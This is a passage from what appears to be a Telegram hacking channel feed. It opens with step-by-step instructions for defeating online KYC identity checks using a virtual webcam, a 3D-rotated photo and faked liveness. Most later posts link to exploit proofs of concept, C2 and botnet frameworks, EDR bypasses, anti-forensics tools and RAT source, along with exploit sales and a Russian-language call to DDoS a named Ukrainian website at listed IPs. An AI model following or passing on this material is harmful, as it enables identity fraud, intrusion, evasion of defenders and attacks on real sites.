on OBS.Now, open ManyCams, go to “Text” tab and uncheck “Show ManyCams logo”Go back on OBS and click on “Start Virtual camera”Now, go back to your website that you try to verify and start the webcam verification, allowaccess and you should see your selected photo on the webpage.You can change the photo position (If you doing selfie verification, so the face would go into the“Head bubble”) on OBS by moving the picture or change the size of it by grabbing the corner ofthe photo. (Red line)"If your KYC puts you to fullscreen as soon as you start the verification and cancelsout if you exit the fullscreen, open OBS, then Start the verification and as soon asyou go to fullscreen, ALT+TAB to OBS window so the verification won't becancelled and you will be able to move your picture around.After that just size your picture to you needs and take the photo."This one of difficult partDamn, that was easy. But my verification requires me torotate my head.A lot of KYC requires you to do that. To bypass that, head to:https://www.smoothie-3d.com/ and create an account there (It requires you to do aPost by @hayper007small donation to use their services, i highly advise you to do that as it will helpyou in your KYC bypass journey)After you successfully created your account and made a small donation, start anew project and then select “Image” and then “Add”.After that you will see your photo on the website, then you should see a smallmenu in the middle up, select “Mode to draw smooth shapes”.After you selected the correct mode, carefully draw a shape around your selfies head.After you did it, you should see your selected area lighter than the background.Post by @hayper007On the left side you will see a small box, select “Rotation mode” and slightly move your cursor in the box area to rotate the selected area.After you managed to make your selfie a 3D model, you can recordyour screen rotating your head and then in OBS under “Sources”tab selecting “Media source”Or, you could select “Window capture” and selecting the“Smoothie-3d” tab and rotating your head live when you doing yourKYC verification.Post by @hayper007Okay, but my selfie looks “Not real”, how do i make it morealive?Note: this part of method involving you using phone to create resource for part of method.Some of the HQ websites (Banks, main crypto exchange sites, etc) could see thatyour selfie is a plain photo as it doesn't have any “Liveliness” in it.To bypass that, you need 2 things.● TikTok account● Smartphone with working cameraIf you have that, go ahead and download TikTok and create an account.
2023-01-17 14:40:36
Post from @hayper007
2023-01-17 14:40:35
Post from @hayper007
2023-01-17 14:40:34
Post from @hayper007
2023-01-17 14:28:06
#Malware_analysis1. Analyzing Rhadamanthys Stealerhttps://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a882. BianLian Ransomware (Decrypted)https://decoded.avast.io/threatresearch/decrypted-bianlian-ransomware
2023-01-17 14:27:36
Class Starting At 8:00 PmJoin Now Invite Link (Web) : https://system32.ink/zoom-meetings/sqli/?pak=QnhXbW50UHpUcnlwUHJ0ekpRYlBlZz09&join=V2NzRklocno1Ylc1YUVyWUVrRFI1QT09&type=meeting&redirect
2023-01-17 14:18:22
#Hardware_SecurityHow Signal Works inside the Kernelhttps://f0rm2l1n.github.io/2022-09-07-How-Signal-Works-inside-the-Kernel
2023-01-17 14:18:21
#tools#Threat_Research1. Detection of Lateral Movement with the Sliver C2 Frameworkhttps://blogs.vmware.com/security/2023/01/detection-of-lateral-movement-with-the-sliver-c2-framework.html]-> https://github.com/vmware-samples/tau-research2. Java code inspector for web vulnerability scanhttps://github.com/4ra1n/code-inspector3. Survey of security mitigations and architectures, December 2022https://saaramar.github.io/memory_safety_blogpost_2022
2023-01-17 14:18:20
#exploit1. Redis 6.0.16 - RCEhttps://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec12. Linux kernel exploit developmenthttps://breaking-bits.gitbook.io/breaking-bits/exploit-development/linux-kernel-exploit-development?s=09
2023-01-17 14:18:19
#tools#Red_Team_Tactics1. Forensia - Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phasehttps://github.com/PaulNorman01/Forensia2. VirusTotalC2 - Abusing VirusTotal API to host C2 traffichttps://github.com/D1rkMtr/VirusTotalC2
2023-01-17 11:53:20
Gmailc2A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections and Network Traffic Restrictions.C2 Feature:▫️ Persistence (type persist)▫️ Shell Access ▫️ System Info (type info)▫️ More Features Will Be AddedFeatures:▫️ FUD Ratio 0/40▫️ Bypass Any EDR's Solutions▫️ Bypass Any Network Restrictions▫️ Commands Are Being Sent in Base64 And Decoded on server side▫️ No More Tcp Shitshttps://system32.ink/news-feed/p/151/
2023-01-17 09:30:32
ClassTopic: Sql injectionTime: 8 Pm ISTDetails: https://system32.ink/classesHost: @vanshsecInvite Link (Web) : https://system32.ink/zoom-meetings/sqli/?pak=QnhXbW50UHpUcnlwUHJ0ekpRYlBlZz09&join=V2NzRklocno1Ylc1YUVyWUVrRFI1QT09&type=meeting&redirectJayada se Jayada Aaye Aur thodi Si Aur knowledge paye
2023-01-17 02:16:06
https://system32.ink/ssrf-to-rce-cve-2018-19585/
2023-01-17 02:15:46
https://system32.ink/sql-structure-query-language/
2023-01-16 10:24:51
https://system32.ink/how-to-start-penetration-testing-of-artificial-intelligence/
2023-01-16 10:00:27
ForensiaAnti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase.#Unloading Sysmon Driver.#Gutmann Method File Shredding.#USNJrnl Disabler.#Prefetch Disabler.#Log Eraser and Event log Disabler.#User Assist Update Time Disabler.#Access Time Disabler.#Clear Recent Items#Clear Shim Cache#Clear RecentFileCache#Clear ShellBag#File Melting Capabilities.https://system32.ink/news-feed/p/139/
2023-01-16 07:59:31
https://github.com/smicallef/spiderfoot
2023-01-16 07:59:30
https://github.com/lanmaster53/recon-ng
2023-01-15 16:02:45
https://www.brecorder.com/news/40220150/pakistan-cg-in-chengdu-official-twitter-handle-hacked
2023-01-15 13:05:50
#Research"TROJANPUZZLE: Covertly Poisoning Code-Suggestion Models", 2023.
2023-01-15 13:05:49
#Malware_analysisHow to Analyze JavaScript Malware - A Case Study of Vjw0rm
2023-01-15 13:05:48
#exploit1. CVE-2022-28944/CVE-2022-24644:EMCO Software Multiple Products/KeyMouse 3.08 (Win) - Unauth. Update RCEhttps://github.com/gerr-re/cve-2022-28944https://github.com/gerr-re/cve-2022-246442. Client-Side SSRF to Google Cloud Project Takeover [Google VRP]https://blog.geekycat.in/client-side-ssrf-to-google-cloud-project-takeover3. CVE-2022-3656:Symbolic Link Following + Upload Warning Bypasshttps://bugs.chromium.org/p/chromium/issues/detail?id=1345275#c34
2023-01-15 13:05:47
#Infographics#Malware_analysisAntivirus Event Analysis Cheat Sheet, ver. 1.11.0.]-> https://www.nextron-systems.com/2023/01/13/antivirus-event-analysis-cheat-sheet-v1-11-0
2023-01-15 13:05:46
#tools#Blue_Team_Techniques1. Detecting Fake Events in Azure Sign-in Logshttps://www.inversecos.com/2023/01/detecting-fake-events-in-azure-sign-in.html2. Crassus - Windows privilege escalation discovery toolhttps://github.com/vullabs/Crassus
2023-01-15 09:18:43
Cheatsheetsof knowledge about information security. https://system32.ink/news-feed/p/138/
2023-01-15 05:01:28
Happy Indian Army Day 💖
2023-01-15 03:51:00
Love you india ❤️❤️
2023-01-15 00:13:40
PTorZillaPrint: Firefox & Tor Browser fingerprint testing. https://github.com/arkenfox/TZP
2023-01-14 15:16:55
https://github.com/dhn/spk
2023-01-14 13:01:33
CVE-2022-46169Exploit to CVE-2022-46169 vulnerability on Cacti 1.2.19https://system32.ink/news-feed/p/135/
2023-01-14 12:56:58
Asta-decryptThis is a simple script that implements the decryption routine for the encrypted final stage used by the Astaroth/Guildma malware family.Astaroth uses an AutoIT script with an embedded DLL that writes the final payload to disk as db.temp and injects it into a hollow process. https://system32.ink/news-feed/p/134/
2023-01-14 08:42:40
Happy Makar Sankranti to all of you❤️
2023-01-14 05:38:19
CVE-2023-21752PoC for arbitrary file delete vulnerability in Windows Backup service https://system32.ink/news-feed/p/133/
2023-01-14 01:07:44
https://system32.ink/news-feed/p/132/
2023-01-14 00:40:47
​​SUDO_KILLERA tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo for linux privilege escalation.https://github.com/TH3xACE/SUDO_KILLER#linux #sudo
2023-01-13 20:37:47
Guys please support me https://youtu.be/aArhzGndTkY
2023-01-13 13:55:41
#Whitepaper"EyeSpy - Iranian Spyware Delivered in VPN Installers", 2023.
2023-01-13 13:55:40
#Malware_analysis1. NeedleDropper Analysishttps://decoded.avast.io/threatresearch/needledropper2. Gootkit Loaderhttps://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html3. "Pre-Owned" malware in ROM on T95 Android TV Box (AllWinner H616)https://github.com/DesktopECHO/T95-H616-Malware
2023-01-13 13:55:39
#exploit1. PoC for arbitrary file delete/move in Razer Synapse 3 Macro modulehttps://github.com/Wh04m1001/RazerEoP2. CVE-2023-21752:PoC for arbitrary file delete vulnerability in Windows Backup servicehttps://github.com/Wh04m1001/CVE-2023-21752
2023-01-13 09:59:33
https://github.com/D1rkMtr/RecyclePersist
2023-01-13 08:04:09
GraphQL exploitation – All you need to know – Cyberveliahttps://ift.tt/lILWoxSSubmitted January 13, 2023 at 02:28AM by Necessary-Reality-80via reddit https://ift.tt/SLsfWgA
2023-01-13 08:04:08
Linux sysadmins, beware!Hackers are exploiting a critical RCE vulnerability in Control Web Panel (CWP) to gain elevated privileges on web servers.Read: https://thehackernews.com/2023/01/alert-hackers-actively-exploiting.htmlPatch your servers ASAP!
2023-01-13 03:56:10
Happy Lohri to everyone
2023-01-12 18:33:56
If u want organic traffic for ur site to promote to eligible for adds ping me @alex14324 escrows welcome 😊
2023-01-12 17:20:05
#reversing#IoT_SecurityReversing embedded device bootloader (U-Boot)Part 1: https://www.shielder.com/blog/2022/03/reversing-embedded-device-bootloader-u-boot-p.1Part 2: https://www.shielder.com/blog/2022/03/reversing-embedded-device-bootloader-u-boot-p.2
2023-01-12 17:20:04
#tools#Malware_analysis#Blue_Team_TechniquesAutomating Malware Analysis Operations (MAOps)https://blogs.jpcert.or.jp/en/2023/01/cloud_malware_analysis.html]-> Malware C2 Monitoring:https://github.com/JPCERTCC/Lucky-Visitor-Scam-IoC]-> Malware Hunting using Cloud:https://github.com/JPCERTCC/CobaltStrike-Config]-> YARA CI/CD system:https://github.com/JPCERTCC/HUILoader-research]-> Surface Analysis System on Cloud:https://github.com/JPCERTCC/SurfaceAnalysis-on-Cloud]-> Memory Forensic on Cloud:https://github.com/JPCERTCC/MemoryForensic-on-Cloud
2023-01-12 17:20:03
#exploit1. CVE-2023-0210:Unauthenticated remote DOS in ksmbd NTLMv2 authentication (Linux kernel)https://seclists.org/oss-sec/2023/q1/42. CVE-2022-20452:Privilege escalation on Android from installed app to system/another app via LazyValue using Parcel after recycle()https://github.com/michalbednarski/LeakValue
2023-01-12 17:20:01
#Research"Apple vs. EMA: Electromagnetic Side Channel Attacks on Apple CoreCrypto", 2022.]-> A Potholing Tour in a SoC:An electromagnetic-wave side-channel issue on ARMv8 AES instructions:https://eshard.com/posts/sca-attacks-on-armv8
2023-01-12 17:20:00
#Threat_ResearchOpen-source Cobalt Strike stager decoderhttps://stairwell.com/news/stairwell-releases-open-source-cobalt-strike-stager-decoder]-> https://github.com/stairwell-inc/cobalt-strike-stager-parser
2023-01-12 17:19:59
#Offensive_security1. SMB "Access is denied" caused by anti-NTLM relay protectionhttps://medium.com/tenable-techblog/smb-access-is-denied-caused-by-anti-ntlm-relay-protection-659c600898952. Implementation of Persistence via Recycle Bin by adding "open\command" subkey to the "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell" key and changing its value to the implant pathhttps://github.com/D1rkMtr/RecyclePersist3. Vulnerabilities on redirected•comhttps://dhakalbibek.medium.com/2022-a-year-of-fascinating-discoveries-d3277dfb006f
2023-01-12 14:39:37
Please like and support it guys…!https://youtu.be/1vMqRZ4OyT4
2023-01-12 10:54:48
Secret HandshakeA prototype malware C2 channel using x509 certificates over mTLSI always wondered if threat actors ever used x509 certificates as part of their C2 communication, not to encrypt the network traffic but to actually embed the C2 communication in the x509 cert. After searching for something like this in the wild for 5 years I finally decided to just code it myself to see if it's possible...it ishttps://github.com/jconwell/secret_handshake#malware
2023-01-12 05:51:59
SpyDialerFree search contact information by phone number, name, address or email.Even shows the names of the neighbors, but the information displayed by the service requires additional verification. https://spydialer.com#osint #humint #usa
2023-01-12 05:32:34
Exploit for CVE-2022-20452 privilege escalation on Android from installed app to system app (or another app)downLoad#android #exploit
2023-01-11 15:31:49
📡Совсем скоро будет представлена эффективная и безопасная система система AARTOS DDS для обнаружения дронов, причем есть защита, которая подбирается индивидуально под заказчика. Сие чуда будет показано на выставке Perimeter Protection с 17 по 19 января 2023 года
2023-01-11 15:24:28
🕵️‍♂️StrongPity espionage campaign targeting Android usersESET researchers identified an active campaign that we have attributed to the StrongPity APT group. Active since November 2021, the campaign has distributed a malicious app through a website impersonating Shagle – a random-video-chat service that provides encrypted communications between strangers. Unlike the entirely web-based, genuine Shagle site that doesn’t offer an official mobile app to access its services, the copycat site only provides an Android app to download and no web-based streaming is possible.
2023-01-11 15:17:16
#Threat_Research1. RCE bug in JWT Secret Poisoning (CVE-2022-23529)https://unit42.paloaltonetworks.com/jsonwebtoken-vulnerability-cve-2022-235292. Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Securityhttps://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic3. Navigating the Vast Ocean of Sandbox Evasionshttps://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection
2023-01-11 15:17:15
#Offensive_security1. Microsoft LAPS(E) in Judgementhttps://www.trustedsec.com/blog/a-lapse-in-judgement2. NonHeavyFTP:A FTP Server pwn chanllengehttps://f0cus77.github.io/RWCTF-2023-NonHeavyFTP-writeup
2023-01-11 15:17:14
#Research"BlockScope: Detecting and Investigating Propagated Vulnerabilities in Forked Blockchain Projects", 2022.]-> https://github.com/VPRLab/BS_VulnReport
2023-01-11 15:17:13
#exploit1. CVE-2022-31705:Geekpwn 2022 Vmware EHCI OOBhttps://github.com/s0duku/cve-2022-317052. Linux >=4.10: UAF in __do_semtimedop() due to lockless check outside RCU sectionhttps://bugs.chromium.org/p/project-zero/issues/detail?id=23913. Lexmark Printers/Copiers haxx 0-day Exploithttps://github.com/blasty/lexmark
2023-01-11 15:17:12
#FuzzingFuzztruction - prototype of a fuzzer that does not directly mutate inputs but instead uses a so-called generator application to produce an input for our fuzzing targethttps://github.com/fuzztruction/fuzztruction#preparing-the-runtime-environment-docker-image
2023-01-11 15:14:57
https://iknowwhatyoudownload.com/
2023-01-11 15:14:56
https://github.com/ipinfo/cli
2023-01-11 15:14:55
https://github.com/Ginsberg5150/Discord-and-Telegram-OSINT-references
2023-01-11 08:59:41
https://system32.ink/news-feed/p/130/
2023-01-11 02:31:47
​​CVE-2022-39073Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit.https://github.com/v0lp3/CVE-2022-39073#cve #exploit
2023-01-11 02:31:46
ImageMagick Security Policy Evaluatorhttps://ift.tt/QNghDT3Submitted January 10, 2023 at 04:52PM by nibblesecvia reddit https://ift.tt/zgW85DB
2023-01-10 18:17:45
https://medium.com/geekculture/how-to-attack-admin-panels-successfully-part-2-9316c3caad3a
2023-01-10 16:31:12
My old video 5 years back tracing ip address
2023-01-10 15:44:50
​​Программируемая Карточка NFC RFID4 930 рублей#Оборудование Translation: ru-enProgrammable NFC RFID Card4 930 rubleshttp://ali.pub/2zecs8‌‌
2023-01-10 15:35:52
⚙️ New Update On AlienFox Ultimate 🦊
2023-01-10 15:30:02
http://Cyberlands.io
2023-01-10 15:18:46
Geolocation Spy (GeoSpy) - is an OSINT analysis and research tool that is used to track and execute intelligent social engineering attacks in real time.▫️https://github.com/askmetoo/geospy
2023-01-10 13:19:07
#exploitSSRF attack on MySQL Server with password using php-curlhttps://github.com/wupco/rwctf2023-ASTLIBRA
2023-01-10 13:19:06
#Red_Team_Tactics1. Bypass EDR Hooks by patching NT API stub, and resolving SSNs and syscall instructions at runtimehttps://github.com/D1rkMtr/UnhookingPatch2. A new AMSI Bypass technique using .NET ALI Call Hookinghttps://github.com/pracsec/AmsiBypassHookManagedAPI3. Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseIDhttps://github.com/D1rkMtr/FilelessNtdllReflection
2023-01-09 18:38:22
𝘾𝙍𝙔𝙋𝙏𝙊 𝙊𝙎𝙄𝙉𝙏:├BTC-ETH-XRP-BCH-LTC-XLM-DASH-ZEC-XMR-TON (Blockchain)├Google Dorks (Change Wallet)├blockchair (Explorer) + Chrome├breadcrumbs (Visualization) + Chrome├shard (Visualization)├blockpath (Visualization)├oxt (Visualization)├graphsense (Visualization)├ethtective (Visualization ETH)├walletexplorer (Grouping)├bitinfocharts (Grouping)├bitcoinabuse (Abuse)├bitcoinwhoswho (Abuse)├checkbitcoinaddress (Abuse)├scamalert (Abuse)├cryptscam (Abuse)├ransomwhe (Abuse)├badbitcoin (Abuse)├bitcoinais (Abuse)├cryptoblacklist (Abuse)├bitrankverified (Scoring)├vivigle (Scoring)├antinalysis (Scoring TOR)├cryptocurrencyalerting (Monitoring)├cryptotxalert (Monitoring)├kycp (Block Analysis)├blockstream (Block Analysis)├fragment (TON market)└btcrecover (Wallet Brute)
2023-01-09 17:41:18
Мы шикарны👄Неплохо поработали💯А свиньи как всегда идут ⚰🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️👍
2023-01-09 17:41:17
📌Добрый вечер, КиберАрмия⚔🇷🇺Пробуем положить усраинский свиносервис для поиска работы, призывающий создавать Call-центры для обзвонов Российских государственных учреждений в целях сообщения ложной информации об их минировании!URL: http://trudbox.com.ua/IP: 85.17.141.222❓IP: 88.85.94.39❓Начинаем⚠️
2023-01-09 17:34:11
https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-to-spread-malware-in-legit-software/
2023-01-09 16:40:34
Сайт пункта подвергся киберсокрушению😏👍‌‌Translation: ru-enThe site of the point was cyber-crashed😏👍‌‌
2023-01-09 11:37:43
https://system32.ink/finding-more-idors-tips-and-tricks/
2023-01-08 15:48:10
Wordpress exploit come with your price @alex14324
2023-01-08 13:03:13
https://system32.ink/news-feed/p/128/
2023-01-08 10:11:11
Leaked FBI Operating System that is used by a certain division known as the Computer Analysis Response Team (CART)https://anonfiles.com/61C7FcQcy5/fbi_cart_v6.0_iso
2023-01-08 03:56:02
https://system32.ink/news-feed/p/127/
2023-01-07 16:38:12
https://mirror-h.org/ IS BACK :)❤️
2023-01-07 15:06:59
#tools#Offensive_security1. Alcatraz - x64 binary obfuscatorhttps://github.com/weak1337/Alcatraz2. Phantom DLL Hollowerhttps://github.com/daem0nc0re/TangledWinExec/tree/main/PhantomDllHollower
2023-01-07 15:04:22
💥Phantom DLL Hollower is a PoC performs Phantom DLL Hollowing which reported by @_forrestorr.🔖Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing⚙️Phantom DLL hollowing PoC
2023-01-07 14:06:21
https://system32.ink/a-guide-to-blind-sql-injection/
2023-01-06 19:38:50
Let me know if anybody interested to purchase price is nogetiable Dm @alex14324
2023-01-06 16:43:11
Cyber Security Attack Vectors👁 #Attack
2023-01-06 16:16:10
#Research"From IP to Transport and Beyond: Cross-Layer Attacks Against Applications", 2022.
2023-01-06 16:16:09
#Threat_Research1. Prototype Pollution in Pythonhttps://blog.abdulrah33m.com/prototype-pollution-in-python2. Pre-Auth RCE in Liferay Portal CE (CVE-2019-16891)https://y4tacker.github.io/2023/01/03/year/2023/TetCTF2023-Liferay-CVE-2019-16891-Pre-Auth-RCE
2023-01-06 16:16:08
#Analytics#InfographicsSystematization of attacks on the perimeter of L2/L3 network equipment. Ver. 3.0.
2023-01-06 15:55:17
https://youtu.be/9i4E3cqFtsM
2023-01-06 15:21:53
Account Takeover Using Password Resetby Unknown
2023-01-06 13:46:01
https://mega.nz/folder/MhkCjLBL#QtBH6zO3ZjaXcnMjJz0V7g4GB pack of osint
2023-01-06 12:37:15
https://system32.ink/news-feed/p/123/
2023-01-06 07:37:36
https://github.com/EVLF/Cypher-Rat-Source-Code
2023-01-06 07:37:16
https://t.me/+XT3pxRBJ9IxjMjk0https://t.me/offensjhttps://t.me/+2074PlVwTiI4NzE1https://t.me/Hackerss_chathttps://t.me/+kBVQdJUqr3tiOTQ0https://t.me/netpainbackup https://t.me/+YDkGOspEKl1mYzdlhttps://t.me/+mfnNjuiTTt5jMTI1https://t.me/crackcodeshttps://t.me/Pentester_Clubhttps://t.me/Pentesterclubpvtltd
2023-01-05 17:29:00
https://youtu.be/9i4E3cqFtsM
2023-01-05 17:23:46
🔹 Usefull Websites 🔹1. Digital Library - Archive.org2. Online Courses - w3schools.com3. Screenshot Taker (Permanent) - Archive.is4. Learn Languages - Duolingo.com5. Screenshot Taker (HD) - Screenshot.guru6. Bypass Login (Websites) - Bugmenot.com7. Graphic Softwares - Vectr.com8. Cracked Softwares - CrackingPatching.com9. File Sharing (2GB) - wetransfer.com10. Autodraw (A.I) - Autodraw.com
2023-01-05 14:08:22
#Research#cryptography"Factoring integers with sublinear resources on a superconducting quantum processor", Dec. 2022.
2023-01-05 14:08:21
#Tech_book"Security Strategies in Linux Platforms and Applications. Third Edition", 2022.
2023-01-05 14:08:20
#WhitepaperAPI Security Best Practices Guide: Comprehensive list of security best practices to secure your APIs throughout their lifecycle + API Security Checklist]-> APIKit: Discovery, Scan and Audit APIs Toolkit: https://github.com/API-Security/APIKit
2023-01-05 14:08:19
#Research#Threat_Research"Open-CyKG: An Open Cyber Threat Intelligence Knowledge Graph", 2021.]-> https://github.com/IS5882/Open-CyKG
2023-01-05 14:08:18
#Research"Experience Report on the Challenges and Opportunities in Securing Smartphones Against Zero-Click Attacks", 2022.
2023-01-05 14:07:55
#DFIRNew Windows 11 Pro (22H2) Evidence of Execution Artifacthttps://aboutdfir.com/new-windows-11-pro-22h2-evidence-of-execution-artifact
2023-01-05 14:07:54
#Threat_Research#Red_Team_Tactics"Autonomous Penetration Testing using Reinforcement Learning"]-> Network Attack Simulator: https://github.com/Jjschwartz/NetworkAttackSimulator
2023-01-05 14:07:53
#Research"EarSpy: Spying Caller Speech and Identity through Tiny Vibrations of Smartphone Ear Speakers", 2022.
2023-01-05 14:07:52
#Offensive_security1. Google Hacking Database (GHDB)https://github.com/readloud/Google-Hacking-Database-GHDB2. NTP Fingerprintinghttps://isc.sans.edu/diary/Its+about+time+OS+Fingerprinting+using+NTP/293943. Powershell scripts for post exploitationhttps://github.com/ItsCyberAli/PowerMeUp
2023-01-05 14:07:51
#Sec_code_reviewOWASP Mobile Application Security Testing Guide (MASTG)https://github.com/OWASP/owasp-mastg
2023-01-05 14:07:50
#exploit#reversing1. Vulnerability in Synology NAShttps://paper.seebug.org/20382. Reverse Engineering and Exploiting an IoT TotoLink N100RE bughttps://faradaysec.com/faraday-ctf-2022-write-up-reverse-engineering-and-exploiting-an-iot-bug3. ESI Injection PoCshttps://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91
2023-01-05 14:07:49
#Malware_analysis1. The Mac Malware of 2022https://objective-see.org/blog/blog_0x71.html2. New version of Raspberry Robinhttps://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe
2023-01-05 14:07:48
#exploit1. Buffer overflow exploit for Stephen Bradshaw's Vulnserverhttps://github.com/shodanwashere/badserver2. CVE-2022-20951:Cisco BroadWorks CommPilot Application Software Unauthenticated SSRFhttps://www.shielder.com/advisories/cisco-broadworks-commpilot-ssrf3. CVE-2022-20958:Cisco BroadWorks CommPilot Application Software Authenticated RCEhttps://www.shielder.com/advisories/cisco-broadworks-commpilot-authenticated-remote-code-execution
2023-01-05 11:19:00
https://system32.ink/block-web-scanners-with-ipset-iptables/
2023-01-05 10:55:14
https://www.checkpoint.com/cyber-hub/cyber-security/what-is-a-zero-click-attack/
2023-01-05 06:25:29
https://github.com/joke2k/faker
2023-01-05 06:25:28
https://github.com/cipher387/osint_stuff_tool_collection
2023-01-04 16:06:49
🔥🔥🔥Indirect syscalls PoCs:💥HellsHall(combination of HellsGate and indirect syscalls) - Another Way To Fetch Clean Syscalls🔖Github repo💥C_SYSCALLS is a single stub direct and indirect syscalling with runtime SSN resolving for windows.💥Hiding Your Syscalls - bypassing detections that I wrote myself. To the best of my knowledge EDR vendors aren’t really alerting on direct syscalls yet.🔖Source code💥FreshyCalls tries to make the use of syscalls comfortable and simple, without generating too much boilerplate and in modern C++! Doesn't it bother you to have to define every syscall stub or function within a module? Or having to depend on the Windows version for the syscalls? Well, forget about all that. FreshyCalls makes use of some features implemented from C++11 such as the variadic templates along with some custom mini-shellcode to avoid this.💥syscalls-asm💥Charon's Ferry(adapted from HellsGate)- An indirect syscaller
2023-01-04 16:06:48
🌐Top 10 web hacking techniques of 2022
2023-01-04 13:10:23
https://system32.ink/fuzzing_the_web_for_mysterious_bugs/
2023-01-04 12:12:16
https://system32.ink/news-feed/p/116/
2023-01-04 04:55:10
​​PyBotNetA #Python framework for building remote control, #botnet , #trojan or #backdoor with Telegram or other control panelshttps://github.com/onionj/pybotnetDocumentation: https://onionj.github.io/pybotnet/
2023-01-04 02:36:24
https://system32.ink/forums/discussion/disscuss-about-socfirewallwebsites/
2023-01-04 01:24:20
https://system32.ink/news-feed/p/113/
2023-01-03 16:37:26
https://youtu.be/ICnXb43hGI0
2023-01-03 12:11:12
https://system32.ink/what-is-doxing-is-doxing-illegal/
2023-01-03 06:49:31
Welcoming Our Forum »» https://system32.inkASK: Anything Related To Tech With Create your Own forumLearn: About Programming,cybersecurity,bugHunting And Many MorePost: Share your Knowledge,Rats,Databases And Videos related to TechSo SignUp Now And Grow Our Community Thank You;
2023-01-03 06:03:07
Fresh Onionshttp://freshonifyfe4rmuh6qwpsexfhdrww7wnt5qmkoertwxmcuvm4woo4ad.onion/
2023-01-03 06:03:06
Hacking tools pack & backdoors generatorhttps://github.com/AdrMXR/KitHackCrack Interface lockscreen, Metasploit and More Android/IOS Hackinghttps://github.com/tegal1337/CiLocksUsing Socks4/5 or http proxies to make a multithreading Http-flood/Https-flood (cc) attackhttps://github.com/Leeon123/CC-attack
2023-01-03 03:10:00
https://system32.ink/exploiting-api-framework-flexibility/
2023-01-02 18:27:41
🔥🔥🔥Survey of security mitigations and architectures, December 2022"This blogpost summarizes and compares some of the exciting approaches in our journey to memory safety. I hope this could become a reference to interested readers and colleagues.Along this blogpost I’ll consider five security properties: spatial safety, temporal safety, type safety, definite initialization and concurrency safety."
2023-01-02 18:27:39
Thank you very much for reading me ❤️Here is an article about reverse firmware in English:https://telegra.ph/Introduction-to-Firmware-Reversal-12-30
2023-01-02 18:24:06
#Infographics#Malware_analysisRansomware & Data Extortion Landscape in 2022https://app.tidalcyber.com
2023-01-02 18:24:05
#Threat_ResearchCVE-2022-27510, CVE-2022-27518 - Measuring Citrix ADC & Gateway version adoption on the Internethttps://blog.fox-it.com/2022/12/28/cve-2022-27510-cve-2022-27518-measuring-citrix-adc-gateway-version-adoption-on-the-internet
2023-01-02 18:24:04
#tools#Blue_Team_Techniques1. HTML Smuggling Detection - HTML Smuggling Detectionhttps://micahbabinski.medium.com/html-smuggling-detection-5adefebb68412. Log4Shell-Scanner-Exploit - Bash script to identify the Log4j CVE-2021-44228 vulnerability remotelyhttps://github.com/julian911015/Log4j-Scanner-Exploit
2023-01-02 15:57:49
https://system32.ink/members/localhost12-hack/activity/106/
2023-01-02 14:30:25
https://youtu.be/LVzVf-b092c
2023-01-02 03:28:20
https://system32.ink/oscp-guide-2023/
2023-01-01 16:02:37
https://youtu.be/Q79J27_VNC4
2023-01-01 15:05:12
Welcoming Our Forum »» https://system32.inkASK: Anything Related To Tech With Create your Own forumLearn: About Programming,cybersecurity,bugHunting And Many MorePost: Share your Knowledge,Rats,Databases And Videos related to TechSo SignUp Now And Grow Our Community Thank You;
2023-01-01 14:48:22
https://system32.ink/video-game-save-file-trojans/
2022-12-31 16:40:29
https://youtu.be/SLl-OeOV14U
2022-12-30 18:15:45
EarSpy – A New Attack on Android Devices Use Motion Sensors to Steal Sensitive Datahttps://gbhackers.com/earspy-android/
2022-12-30 18:12:58
Мой диплом по безопасности динамической маршрутизации, который я защитил на отлично в этом году (заканчивал я значит колледж)Пользуйтесь на здоровье
2022-12-30 16:39:49
🧰RedTeam-Tools is github repository contains a collection of tools and resources that can be useful for red teaming activities.⚙️Reconnaissance⚙️Resource Development⚙️Initial Access⚙️Execution⚙️Persistence⚙️Privilege Escalation⚙️Defense Evasion⚙️Credential Access⚙️Discovery⚙️Lateral Movement⚙️Collection⚙️C&C⚙️Exfiltration⚙️Impact
2022-12-30 16:26:31
#hardeningWindows 10 Hardening (v.0.9.0) settings and configurationshttps://github.com/0x6d69636b/windows_hardening
2022-12-30 16:26:30
#reversing1. Reverse Engineering Rustlang Binaries - A Serieshttps://brightprogrammer.netlify.app/post/reverse-engineering-rustlang-binaries-0x1-empty-program2. Huawei's Security Hypervisorhttps://blog.impalabs.com/2212_huawei-security-hypervisor.html
2022-12-30 16:26:29
#Malware_analysis1. GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detectionhttps://gbhackers.com/guloader-malware-advanced-anti-analysis2. CatB Ransomwarehttps://minerva-labs.com/blog/new-catb-ransomware-employs-2-year-old-dll-hijacking-technique-to-evade-detection
2022-12-30 16:26:28
#Threat_ResearchSupply-Chain Security:Evaluation of Threats and Mitigationshttps://engineering.mercari.com/en/blog/entry/20221215-supplychain-security-reevaluation
2022-12-30 16:26:27
#Research#Sec_code_review"Do Users Write More Insecure Code with AI Assistants?", 2022.
2022-12-30 16:26:26
#Cloud_Security1. Parsing and manipulating JSON in Powershellhttps://isc.sans.edu/diary/293802. Passwordless Persistence and Privilege Escalation in Azurehttps://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f
2022-12-30 15:18:22
must watch once video by @Deadlymalwarexp💻@Deadlymalwarexp💻
2022-12-30 14:42:22
https://youtu.be/wlMYVvHRxf8
2022-12-30 14:17:12
